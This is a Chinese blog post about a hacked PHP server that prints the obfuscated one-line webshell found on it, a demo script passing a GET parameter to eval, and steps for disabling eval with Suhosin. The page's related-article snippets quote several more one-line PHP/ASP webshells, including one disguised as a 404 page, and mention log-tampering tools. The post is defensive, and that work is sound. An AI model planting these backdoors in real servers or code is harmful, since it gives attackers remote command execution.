中木马了

最新推荐文章于 2020-12-11 15:10:10 发布
最新推荐文章于 2020-12-11 15:10:10 发布
阅读量1.6k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maray/article/details/49945607
版权

服务器中了木马,代码如下:

($b4dboy = $_POST['aaa']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

原理:

这段代码将post进来的数据直接调用eval执行。来个更简单的,保存为test.php:

<?php
// filename: test.php
$var = "var";

if (isset($_GET["arg"]))

{

  $arg = $_GET["arg"];

  eval("\$var = $arg;"); // 这一句容易写错,导致验证效果不对

  echo $var;

}
?>

然后访问服务器:http://www.xxx.com/test.php?arg=phpinfo(),看看白花花的系统配置输出,就能体会到危险性了。



解决方案:

看来得把eval禁用掉了。用SUHOSIN。详见下面的评论。



如何测试是否禁用成功,增加程序test.php:

<?php
//  例子来源:http://www.php.net/manual/zh/function.eval.php
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
eval("\$str = \"$str\";");
echo $str. "\n";
?>

如果能打印出This is a cup with my coffee in it. 说明没有禁用成功。如果返回500错误,说明禁用成功。



方法二:通过命令行运行test.php,会输出下面的错误,表示禁用成功了:

[root@AY]# php test.php
PHP Fatal error:  SUHOSIN - Use of eval is forbidden by configuration in /home/domain/test.php(6) : eval()'d code on line 1


maray
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
禁用eval函数
weixin_44706754的博客
04-19 2669
(PHP 4, PHP 5, PHP 7) 无论是linux服务器还是windows服务器,eval命令是非常危险的 一、如何禁用eval命令 在php.ini这样设置disable_functions =eval是无法禁用eval的,根据php手册说明,eval是一个语言构造器而不是一个函数。如果要禁用eval,则需要第三方扩展,使用Suhosin linux下suhosin的安装: wg...
计算机木马
weixin_44520274的博客
01-29 1641
木马 1.计算机木马(Computer Trojan Horse) 指具有欺骗、盗取受害者计算机敏感信息以及恶意操控等危害的程序 木马程序一般隐藏在图片、小游戏、视频等文件 2.木马植入过程 过程: 1.配置木马 木马伪装、信息反馈 2.传播木马 软件下载、邮件附件、淫秽图片等 3.启动木马 自动启动、潜伏待命 4.建立连接 主动、被动连接 5.远程控制 3.木马程序演示 配置“大白鲨”...
php 扩展 suhosin 配置不当引发的报错及其解决方法
weixin_34245169的博客
07-27 581
1、 /var/log/messages 频繁报错: Jul 24 03:27:04 localhost suhosin[9115]: ALERT - script tried to increase memory_limit to 524288000 bytes which is above the allow ed value (attacker '14.215.58.244', f...
使用Suhosin保护PHP应用系统(禁用eval
whatday的专栏
03-01 6164
一、什么是Suhosin?         Suhosin是一个PHP程序的保护系统。它的设计初衷是为了保护服务器和用户抵御PHP程序和PHP核心,已知或者未知的缺陷。Suhosin有两个独立的部分,使用时可以分开使用或者联合使用。第一部分是一个用于PHP核心的补丁,它能抵御缓冲区溢出或者格式化串的弱点;第二部分是一个强大的PHP扩展,包含其他所有的保护措施。   二、下载地址
python连接linux获取日志_python修改linux日志(logtamper.py)
weixin_39612720的博客
12-08 251
#!/usr/bin/env python#-*- coding:utf-8 -*-#mail: cn.b4dboy@gmail.comimportos, struct, sysfrom pwd importgetpwnamfrom time importstrptime, mktimefrom optparse importOptionParserUTMPFILE= "/var/run/utmp...
Suhosin的配置参数
xuyaqun的专栏
02-21 2951
参考http://www.hardened-php.net/suhosin/configuration.htmlConfigurationSuhosin‘s features are all configured through the php.ini configuration file. Here you can find descriptions of all s
一句话木马
weixin_47836220的博客
12-11 2405
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵始终扮演着强大的作用。 常见的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%> 【基本原理】利用文件上传漏洞,往目标网
MSSQL木马修复,木马后的处理方法
09-10
本文将详细讨论如何识别和修复MSSQL木马,以及木马后的处理方法。 首先,了解木马的常见行为是至关重要的。木马通常通过恶意SQL注入、不安全的网络连接、漏洞利用等方式进入MSSQL数据库。它们可能篡改数据、...
是否木马后门
02-12
"是否木马后门"这个标题暗示了我们正在讨论的是一个用于检测计算机系统是否被这类恶意软件感染的工具或过程。然而,描述提到"本身也是木马程序"这一句话让人警觉,这可能意味着该文件或工具可能是不安全的,因为...
批量更新数据库所有表字段的内容,木马后的急救处理
01-21
代码如下:declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b ,systypes c where a.id=b.id and a.xtype=’u’ and c.name in (‘char...
木马与病毒
03-26
在计算机安全领域木马和病毒都是常见的恶意代码,但它们之间有着明显的区别。木马是指隐藏在正常程序的恶意代码,具备破坏和删除文件、发送密码、记录键盘和攻击 Dos 等特殊功能的后门程序。病毒则是指编制...
那些强悍的PHP一句话后门
weixin_30338461的博客
05-11 1976
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 ...
悬镜安全强烈推荐丨内网安全检查/渗透总结,先收藏再说
Anprou的博客
07-06 6388
浏览文章的时候,能够看到一篇干货满满的文章,实属不易,能够把内网安全渗透测试的整个阶段所涉及到的信息整理的如何全面也是值得佩服,废话不多说,直接上文章。本篇文章首发平台先知社区,如需转载,请标注来源。阅读本篇文章大约需要15分钟,建议先收藏,慢慢看。修订记录编号日期修订内容12018.5.18初稿A2B2C2A3B3C31. 内网安全检查/渗透介绍1.1 攻击思路有2种思路:攻击外网服务器,获取外...
PHP一句话后门
xyang
05-26 3120
404 Not Found Not Found The requested URL was not found on this server. <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
6.2 Linux痕迹清除
robacco的博客
09-23 1092
Linux 日志文件一般包括如下: (1) /var/log/messages:每一行包含日期、主机名、程序名,接着是PID或内核标识,最后是消息;文本文件 (2) /var/log/wtmp:永久记录每个用户登录、注销及系统的启动和关机事件,用来查看用户的登录记录,last命令通过访问这个文件获得信息;二进制文件,使用last命令查看 (3) /var/run/utmp:记录有关当前登录的...
linux系统木马文件后缀
最新发布
08-01
Linux系统木马文件可以使用各种后缀来隐藏其真实性质。以下是一些常见的木马文件后缀: 1. .exe:这是Windows系统上常见的可执行文件后缀,但是也可以在Linux系统伪装成.exe后缀的文件。 2. .sh:这是Shell脚本文件后缀,用于在Linux系统上执行一系列命令。黑客可以将木马代码放入.sh文件,并通过执行该脚本来运行木马程序。 3. .py:这是Python脚本文件后缀,类似于.sh文件,黑客可以将木马代码放入.py文件,并通过执行该脚本来启动木马程序。 4. .so:这是Linux系统上的共享库文件后缀。黑客可以将木马代码编译成共享库,并将其后缀修改为.so,然后通过加载该库来运行木马程序。 5. .dll:这是Windows系统上的动态链接库文件后缀,但是也可以在Linux系统找到.dll后缀的文件。黑客可以将木马代码编译成.dll文件,并将其放在Linux系统。 6. .jar:这是Java的存档文件后缀。黑客可以将木马代码放在.jar文件,并通过Java虚拟机来执行该文件。 请注意,以上列举的后缀只是一部分常见的木马文件后缀,黑客可以使用各种方法和技术来伪装木马文件,并使用不同的后缀来混淆系统或逃避防御机制。因此,使用杀毒软件和定期更新系统补丁是保护自己免受木马文件攻击的重要措施。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值